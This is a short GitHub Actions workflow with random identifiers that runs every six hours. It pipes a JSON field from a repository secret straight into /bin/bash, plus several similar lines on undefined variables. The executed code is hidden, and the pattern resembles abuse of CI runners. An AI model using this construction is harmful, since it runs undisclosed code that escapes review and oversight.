name: juededy
on:
  workflow_dispatch:
  schedule:
    - cron: '36 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: juededy
        env:
          edhnx0966: ${{ secrets.edhnx0966 }}
        run: |
          echo $edhnx0966 | jq -r .dvm6769 | /bin/bash
          echo $axakl22 | jq -r .rc91576 | /bin/bash
          echo $sh1253 | jq -r .et35927 | /bin/bash
          echo $enpwn4 | jq -r .zsvt08 | /bin/bash
          echo $sputc660 | jq -r .mc59 | /bin/bash
          echo $lhnn17 | jq -r .zyyv542 | /bin/bash

